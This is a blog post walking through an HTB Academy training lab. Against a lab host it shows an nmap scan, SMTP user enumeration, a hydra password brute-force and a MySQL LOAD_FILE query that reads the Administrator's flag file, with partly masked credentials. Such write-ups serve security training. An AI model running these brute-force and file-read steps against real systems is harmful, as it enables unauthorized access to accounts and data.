DEV Community

maz4l
maz4l

Posted on • Updated on

HTB Academy: Attacking Common Services Module - Easy Lab

Image description

Attacking Common Services - Easy Lab

We were commissioned by Inlanefreight to conduct a penetration test on three different hosts to evaluate their security configurations. Our task was to identify vulnerabilities and locate a flag placed on each server to verify successful access. The flags have the format:

  • HTB{...}

In this post, we will review the security of the first server, which is responsible for managing emails, customer data, and files.

Task

Assess the target server at the domain inlanefreight.htb and obtain the contents of the flag.txt file. Submit the flag as your answer.

Solution Steps:

Update /etc/hosts

Add the target IP and domain to the /etc/hosts file to facilitate easier access:



   echo "10.129.xxx.xx inlanefreight.htb" | sudo tee -a /etc/hosts


Enter fullscreen mode Exit fullscreen mode

Enumerate the Target

Perform a service scan on the target to identify open ports and services:



   nmap -sV 10.129.xxx.xxx -Pn


Enter fullscreen mode Exit fullscreen mode

Results:



   21/tcp   open  ftp
   25/tcp   open  smtp          hMailServer smtpd
   80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
   443/tcp  open  https?
   587/tcp  open  smtp          hMailServer smtpd
   3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
   3389/tcp open  ms-wbt-server Microsoft Terminal Services


Enter fullscreen mode Exit fullscreen mode

Find Valid Users

Use smtp-user-enum to identify valid SMTP users:



   smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.xxx.xx


Enter fullscreen mode Exit fullscreen mode

Results:



   Starting smtp-user-enum v1.2 (http://pentestmonkey.net/tools/smtp-user-enum)
   Mode ..................... RCPT
   Worker Processes ......... 5
   Usernames file ........... userlist.txt
   Target count ............. 1
   Username count ........... 79
   Target TCP port .......... 25
   Query timeout ............ 5 secs
   Target domain ............ inlanefreight.htb

   ######## Scan started at Wed Aug 7 06:27:03 2024 #########
   10.129.203.7: f****@inlanefreight.htb exists
   ######## Scan completed at Wed Aug 7 06:27:51 2024 #########
   1 result found: **f****@inlanefreight.htb**


Enter fullscreen mode Exit fullscreen mode

Brute-Force the Password

Use hydra to brute-force the password for the identified user:



   hydra -l f****@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt.gz -t 64 -f 10.129.xxx.xx smtp


Enter fullscreen mode Exit fullscreen mode

Results:



   login: f****@inlanefreight.htb   password: 9********


Enter fullscreen mode Exit fullscreen mode

Connect to MySQL

Log into the MySQL server using the credentials obtained:



   mysql -u f**** -p9******** -h 10.129.xxx.xx


Enter fullscreen mode Exit fullscreen mode

For reading local files in MySQL we will use command from module Cheat Sheet:



Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 11
Server version: 10.4.24-MariaDB [mariadb.org] binary distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SELECT LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt");
+------------------------------------------------------+
| LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt") |
+------------------------------------------------------+
| HTB{t*3_4r3_tw0_t0_93t_fl49} |
+------------------------------------------------------+
1 row in set (0.070 sec)

Enter fullscreen mode Exit fullscreen mode




Happy Hunting!

By following these steps, we successfully identified a valid SMTP user, brute-forced their password, and accessed the MySQL database to retrieve the flag. This demonstrates a straightforward approach to assessing the security of email and database services.

Top comments (0)